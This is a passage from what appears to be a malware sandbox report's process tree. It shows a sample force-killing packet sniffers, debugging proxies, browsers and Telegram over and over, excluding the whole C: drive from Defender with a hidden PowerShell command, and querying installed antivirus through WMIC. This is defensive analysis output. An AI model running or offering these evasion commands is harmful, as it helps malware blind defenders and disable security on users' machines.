C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3288

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4148

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3912

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:956

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
- Kills process with taskkill
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3628

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:5076

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2160

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4800

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4332

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3084

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4220

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:1880

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:1104

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:376

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4048

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4904

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:1136

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:5060

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:1840

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4732

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3508

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4032

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4812

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:832

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2184

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3084

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4848

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2396

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3716

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3408

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2612

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4800

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
- Kills process with taskkill
PID:4380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2240

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:760

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4388

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3316

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:1116

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2536

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4252

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1664

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:2180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2656

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4876

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2076

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4892

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4568

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4468

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4984

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4444

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:3364

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:4808

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:4440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:4416

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
PID:4380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:4920

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
PID:3540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:4516

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:4372

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:4324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:2448

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:2060

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:2020

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:3804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:4516

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:4440

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:2992

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:1588

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:4380

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:2956

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:2388

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:4188

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:4344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:4568

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:1216

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:3420

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:216

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:3468

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:4640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:2312

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:2688

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:4384

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:2192

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
PID:1068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:3836

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2060

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:2020

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:4564

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:2244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:4920

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:4184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:2976

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:3168

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:3812

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:3112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:4380

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
- Kills process with taskkill
PID:1644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:3540

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3040

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:1596

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:1572

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2972

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:4560

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:4332

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:3508

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:1588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:3804

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
- Kills process with taskkill
PID:464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:2460

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
PID:3540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:4496

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:4280

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:3568

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:1652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:1984

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:3812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:3612

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:372

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:1580

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
PID:4288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:3580

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:1768

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3044

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:2532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:1652

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:4516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
5⤵
PID:232

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3812

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
6⤵
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
5⤵
PID:4012

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
6⤵
PID:1284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
5⤵
PID:3912

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
6⤵
PID:2988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
5⤵
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
6⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
5⤵
PID:2312

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
6⤵
PID:556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
5⤵
PID:2568

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
6⤵
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
5⤵
PID:2844

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
6⤵
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
5⤵
PID:4748

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
6⤵
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
5⤵
PID:3420

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2448

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
6⤵
PID:612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6b37ab58,0x7ffc6b37ab68,0x7ffc6b37ab78
2⤵
PID:4748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:2
2⤵
PID:4212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
2⤵
PID:4608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
2⤵
PID:1688

C:\Program Files\Google\Chrome\Application\chrome.exe
